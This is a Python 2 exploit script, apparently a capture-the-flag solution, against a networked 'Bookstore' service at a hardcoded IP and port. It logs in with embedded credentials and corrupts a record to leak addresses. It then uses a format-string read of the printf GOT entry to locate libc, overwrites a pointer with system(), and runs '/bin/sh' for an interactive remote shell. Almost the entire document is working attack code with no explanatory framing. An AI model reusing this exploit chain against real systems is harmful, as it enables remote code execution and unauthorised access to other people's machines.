import time,socket from codez import * LOCAL = sys.argv[1] == 'l' class Bookstore(Remote): def login(self): self.read(':') if LOCAL: self.sendline('xhelloadmin') else: self.sendline('helloadmin') self.read(':') self.sendline('iulover!@#$') def cmd(self,n): self.read('>'); self.sendline(str(n)) def add(self,n,d,t): self.cmd(1) for x in [n,d]: self.read(':') self.sendline(x) self.read(')') self.sendline(str(t)) def modify(self,id): self.cmd(2) self.read(':');self.sendline(str(id)) self.read('!') def back(self): self.read('!'); self.sendline('0') def modif_name(self,id,n): self.modify(id) self.sendline('1') self.read('\n');self.write(n) self.back() def modif_desc(self,id,d): self.modify(id) self.sendline('2') self.read('\n'); self.read('\n'); self.write(d) self.read('!') self.back() def modif_info(self,id,n,d,stock=0,price=0,frees=0,av=0): self.modify(id) self.sendline('3') self.read(':');self.sendline(str(stock)) self.read(':');self.sendline(str(price)) self.read(')');self.sendline(str(frees)) self.read(':');self.sendline(str(av)) self.read('\n');self.sendline(n);self.read('!') self.read('\n');self.sendline(d);self.read('!') self.back() def modif_ship(self,id,ship): self.modify(id) self.sendline('4') self.read(')');self.sendline(str(ship)) self.back() def print_book(self,id): self.cmd(3) self.read(':');self.sendline(str(id)) self.read('\n') return self.read('=')[:-1] def list(self): self.cmd(4) self.read('N') time.sleep(0.1) r= self.read('=')[:-1] return r if LOCAL: bs = Bookstore('127.0.0.1',1234) printf_off = 0x4a0d0 system = 0x3b040 # r.set_constants('') else: bs= Bookstore('54.65.210.251',31337) system = 0x3e360 printf_off = 0x4cbf0 #r.go() ## lets rool bs.login() bs.add('a','b',0) bs.modif_info(0,'X'*20,'x',stock=0x44414141,price=0x41414141) r=bs.list() r=r[r.index('name'):] r=r[r.index('D')+1:][:4] base=unpack('I',r)[0] - 0x9ad _printf_got = base + 0x400c _printf_plt = base + 0x680 index = 13 print '[+] base',hex(base) print '[+] printf@got',hex(_printf_got) print '[+] printf@plt',hex(_printf_plt) print '[+] fmt index',str(index) time.sleep(0.1) bs.modif_name(0,pack('I',_printf_plt)*(0x1f4/4) ) bs.modif_info(0,'####%'+str(index)+'$s|XX'+pack('I',_printf_got),'b') bs.modif_ship(0,1) sys.stdout.flush() def one_read(addr): bs.modif_name(0,'####%'+str(index)+'$s|XX'+pack('I',addr)) x=bs.print_book(0).split('####')[1] if x[0]=='|': return "\x00"*4 return x def arb_read(addr,s): out = '' i = 0 if s <= 4: return one_read(addr)[:s] while i < (s>>2): try: out+= one_read(addr+4*i) i += 1 except: return out return out printf = unpack('I',bs.print_book(0).split('####')[1][:4])[0] libc = printf - printf_off system += libc print '[+] printf', hex(printf) print '[+] libc', hex(libc) print '[+] system', hex(system) sys.stdout.flush() bs.modif_name(0,pack('I',system)*(0x1f4/4)) bs.modif_info(0,'/bin/sh #\x00','b') bs.modif_ship(0,1) bs.print_book(0) bs.interactive()